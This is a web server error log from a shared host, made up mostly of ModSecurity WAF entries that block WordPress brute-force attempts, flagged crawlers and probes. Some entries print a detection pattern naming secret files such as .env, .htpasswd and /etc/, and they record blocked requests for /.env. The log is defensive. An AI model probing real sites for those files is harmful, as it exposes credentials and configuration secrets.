[Tue May 26 16:07:37.099192 2026] [security2:error] [pid 773493:tid 773713] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV38Jgy-Vk4jSdqTCQ97AAAAN8"]
[Tue May 26 16:07:38.117079 2026] [security2:error] [pid 773493:tid 773700] [client 152.44.110.199:51867] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV38Zgy-Vk4jSdqTCQ9_QAAANI"], referer: https://anujtradingco.com
[Tue May 26 16:07:38.232095 2026] [security2:error] [pid 773493:tid 773705] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV38Zgy-Vk4jSdqTCQ-AAAAANc"]
[Tue May 26 16:07:39.410652 2026] [autoindex:error] [pid 773493:tid 773673] [client 43.166.130.123:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://aeromodellingconsultants.com
[Tue May 26 16:07:39.492760 2026] [core:error] [pid 773493:tid 773628] [client 198.235.24.159:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:07:39.492776 2026] [core:error] [pid 773493:tid 773628] [client 198.235.24.159:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:07:40.117358 2026] [security2:error] [pid 773493:tid 773634] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV385gy-Vk4jSdqTCQ-OAAAAJA"]
[Tue May 26 16:07:42.309267 2026] [security2:error] [pid 773493:tid 773637] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV39Zgy-Vk4jSdqTCQ-YwAAAJM"]
[Tue May 26 16:07:42.746617 2026] [security2:error] [pid 773493:tid 773715] [client 62.60.130.233:50936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV39pgy-Vk4jSdqTCQ-eAAAAOE"]
[Tue May 26 16:07:43.074845 2026] [security2:error] [pid 773493:tid 773627] [client 62.60.130.233:63077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV395gy-Vk4jSdqTCQ-hQAAAIk"]
[Tue May 26 16:07:44.333577 2026] [security2:error] [pid 773493:tid 773656] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV395gy-Vk4jSdqTCQ-ogAAAKY"]
[Tue May 26 16:07:46.360917 2026] [security2:error] [pid 773493:tid 773663] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3-Zgy-Vk4jSdqTCQ-ywAAAK0"]
[Tue May 26 16:07:46.557010 2026] [security2:error] [pid 773493:tid 773731] [client 176.65.139.234:51674] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bosscoirs.com"] [uri "/.env"] [unique_id "ahV3-pgy-Vk4jSdqTCQ-3AAAAPE"]
[Tue May 26 16:07:46.599548 2026] [security2:error] [pid 773493:tid 773687] [client 167.71.246.78:44145] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahV3-Jgy-Vk4jSdqTCQ-rwAAxSo"]
[Tue May 26 16:07:47.205993 2026] [security2:error] [pid 773493:tid 773691] [client 106.219.85.83:10271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3-5gy-Vk4jSdqTCQ-5wAAAMk"]
[Tue May 26 16:07:47.206158 2026] [security2:error] [pid 773493:tid 773691] [client 106.219.85.83:10271] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3-5gy-Vk4jSdqTCQ-5wAAAMk"]
[Tue May 26 16:07:48.430589 2026] [security2:error] [pid 773493:tid 773736] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3_Jgy-Vk4jSdqTCQ_AwAAAPY"]
[Tue May 26 16:07:48.515945 2026] [security2:error] [pid 773493:tid 773628] [client 49.13.164.148:63312] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV3_Jgy-Vk4jSdqTCQ_DQAAAIo"], referer: http://ucdc.co.in/
[Tue May 26 16:07:49.032845 2026] [security2:error] [pid 773493:tid 773668] [client 176.65.139.234:52564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.bosscoirs.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahV3_Zgy-Vk4jSdqTCQ_FwAAALI"]
[Tue May 26 16:07:49.806519 2026] [security2:error] [pid 773493:tid 773688] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3_Zgy-Vk4jSdqTCQ_IAAAAMY"]
[Tue May 26 16:07:51.410940 2026] [core:crit] [pid 773493:tid 773637] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:07:52.715539 2026] [security2:error] [pid 773493:tid 773723] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4AJgy-Vk4jSdqTCQ_YgAAAOk"]
[Tue May 26 16:07:54.670739 2026] [security2:error] [pid 773493:tid 773673] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Apgy-Vk4jSdqTCQ_mAAAALc"]
[Tue May 26 16:07:55.327016 2026] [security2:error] [pid 773493:tid 773724] [client 216.244.66.241:59074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/activity/koeki_nintei/"] [unique_id "ahV4A5gy-Vk4jSdqTCQ_swAAAOo"]
[Tue May 26 16:07:55.327126 2026] [security2:error] [pid 773493:tid 773724] [client 216.244.66.241:59074] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/activity/koeki_nintei/"] [unique_id "ahV4A5gy-Vk4jSdqTCQ_swAAAOo"]
[Tue May 26 16:07:56.196590 2026] [security2:error] [pid 773493:tid 773628] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4A5gy-Vk4jSdqTCQ_uQAAAIo"]
[Tue May 26 16:07:57.364725 2026] [security2:error] [pid 773493:tid 773749] [client 114.119.165.5:54987] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/robots.txt"] [unique_id "ahV4BZgy-Vk4jSdqTCQ_1wAAAQM"]
[Tue May 26 16:07:57.817187 2026] [security2:error] [pid 773493:tid 773726] [client 106.219.85.83:7296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4BZgy-Vk4jSdqTCQ_4AAAAOw"]
[Tue May 26 16:07:57.817337 2026] [security2:error] [pid 773493:tid 773726] [client 106.219.85.83:7296] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4BZgy-Vk4jSdqTCQ_4AAAAOw"]
[Tue May 26 16:07:58.572063 2026] [security2:error] [pid 773493:tid 773683] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Bpgy-Vk4jSdqTCQ_6wAAAME"]
[Tue May 26 16:08:00.909699 2026] [security2:error] [pid 773493:tid 773647] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4CJgy-Vk4jSdqTCRALgAAAJ0"]
[Tue May 26 16:08:01.330403 2026] [security2:error] [pid 773493:tid 773723] [client 103.44.52.196:35604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4CZgy-Vk4jSdqTCRAQQAAAOk"]
[Tue May 26 16:08:01.330536 2026] [security2:error] [pid 773493:tid 773723] [client 103.44.52.196:35604] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4CZgy-Vk4jSdqTCRAQQAAAOk"]
[Tue May 26 16:08:02.824871 2026] [security2:error] [pid 773493:tid 773678] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Cpgy-Vk4jSdqTCRAXwAAALw"]
[Tue May 26 16:08:03.563747 2026] [security2:error] [pid 773493:tid 773635] [client 216.244.66.241:59076] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/fs/coffee/224porcelain/224porcelain-coffehat-r"] [unique_id "ahV4C5gy-Vk4jSdqTCRAeAAAAJE"]
[Tue May 26 16:08:03.563845 2026] [security2:error] [pid 773493:tid 773635] [client 216.244.66.241:59076] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/fs/coffee/224porcelain/224porcelain-coffehat-r"] [unique_id "ahV4C5gy-Vk4jSdqTCRAeAAAAJE"]
[Tue May 26 16:08:04.929757 2026] [security2:error] [pid 773493:tid 773748] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4DJgy-Vk4jSdqTCRAkAAAAQI"]
[Tue May 26 16:08:04.989898 2026] [security2:error] [pid 773493:tid 773637] [client 74.7.175.152:34912] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "consola.co"] [uri "/cgi-sys/404.html"] [unique_id "ahV4DJgy-Vk4jSdqTCRAngAAkz0"]
[Tue May 26 16:08:07.205811 2026] [security2:error] [pid 773493:tid 773684] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Dpgy-Vk4jSdqTCRAyAAAAMI"]
[Tue May 26 16:08:08.013066 2026] [security2:error] [pid 773493:tid 773712] [client 216.244.66.241:37850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/kmc-hp/"] [unique_id "ahV4EJgy-Vk4jSdqTCRA2QAAAN4"]
[Tue May 26 16:08:08.013260 2026] [security2:error] [pid 773493:tid 773712] [client 216.244.66.241:37850] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/kmc-hp/"] [unique_id "ahV4EJgy-Vk4jSdqTCRA2QAAAN4"]
[Tue May 26 16:08:08.343992 2026] [security2:error] [pid 773493:tid 773628] [client 106.219.85.83:19783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4EJgy-Vk4jSdqTCRA4wAAAIo"]
[Tue May 26 16:08:08.344095 2026] [security2:error] [pid 773493:tid 773628] [client 106.219.85.83:19783] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4EJgy-Vk4jSdqTCRA4wAAAIo"]
[Tue May 26 16:08:09.079124 2026] [security2:error] [pid 773493:tid 773694] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4EJgy-Vk4jSdqTCRA6gAAAMw"]
[Tue May 26 16:08:09.650119 2026] [security2:error] [pid 773493:tid 773734] [client 14.229.172.212:60699] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.toronto121mortgage.com"] [uri "/contact-us.php"] [unique_id "ahV4EZgy-Vk4jSdqTCRBBgAAAPQ"]
[Tue May 26 16:08:09.650161 2026] [security2:error] [pid 773493:tid 773734] [client 14.229.172.212:60699] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "www.toronto121mortgage.com"] [uri "/contact-us.php"] [unique_id "ahV4EZgy-Vk4jSdqTCRBBgAAAPQ"]
[Tue May 26 16:08:11.042862 2026] [security2:error] [pid 773493:tid 773704] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Epgy-Vk4jSdqTCRBJAAAANY"]
[Tue May 26 16:08:11.488115 2026] [security2:error] [pid 773493:tid 773650] [client 103.44.52.196:46564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4E5gy-Vk4jSdqTCRBNwAAAKA"]
[Tue May 26 16:08:11.488261 2026] [security2:error] [pid 773493:tid 773650] [client 103.44.52.196:46564] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4E5gy-Vk4jSdqTCRBNwAAAKA"]
[Tue May 26 16:08:12.548591 2026] [security2:error] [pid 773493:tid 773689] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4FJgy-Vk4jSdqTCRBUQAAAMc"]
[Tue May 26 16:08:13.890797 2026] [security2:error] [pid 773493:tid 773652] [client 40.77.167.151:6173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 151.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "amdsi.org.in"] [uri "/amdsi-about-history.php"] [unique_id "ahV4FZgy-Vk4jSdqTCRBeAAAAKI"]
[Tue May 26 16:08:14.935713 2026] [security2:error] [pid 773493:tid 773559] [remote 103.11.102.22:59630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahV4Fpgy-Vk4jSdqTCRBjwAA-0E"]
[Tue May 26 16:08:15.114498 2026] [security2:error] [pid 773493:tid 773677] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Fpgy-Vk4jSdqTCRBjgAAALs"]
[Tue May 26 16:08:15.303520 2026] [core:crit] [pid 773493:tid 773633] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:08:16.601533 2026] [security2:error] [pid 773493:tid 773686] [client 43.173.177.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV4GJgy-Vk4jSdqTCRBuQAAAMQ"]
[Tue May 26 16:08:16.650501 2026] [security2:error] [pid 773493:tid 773701] [client 43.173.177.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV4GJgy-Vk4jSdqTCRBvgAAANM"]
[Tue May 26 16:08:16.985811 2026] [security2:error] [pid 773493:tid 773740] [client 114.119.156.165:33905] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV4GJgy-Vk4jSdqTCRByQAAAPo"], referer: http://glorodavionics.com/beta/index.php?route=product/product&manufacturer_id=11&product_id=131&page=1
[Tue May 26 16:08:17.245079 2026] [security2:error] [pid 773493:tid 773735] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4GJgy-Vk4jSdqTCRByAAAAPU"]
[Tue May 26 16:08:17.504041 2026] [security2:error] [pid 773493:tid 773668] [client 74.7.175.142:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mail.stockmarketanalysis.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV4GZgy-Vk4jSdqTCRB3QAAALI"]
[Tue May 26 16:08:17.504662 2026] [security2:error] [pid 773493:tid 773660] [client 74.7.175.142:37756] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mail.stockmarketanalysis.in"] [uri "/robots.txt"] [unique_id "ahV4GZgy-Vk4jSdqTCRB2wAAqk4"]
[Tue May 26 16:08:18.854424 2026] [security2:error] [pid 773493:tid 773673] [client 113.211.214.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Gpgy-Vk4jSdqTCRB9wAAALc"]
[Tue May 26 16:08:19.105739 2026] [security2:error] [pid 773493:tid 773737] [client 106.219.85.83:23070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Gpgy-Vk4jSdqTCRCCgAAAPc"]
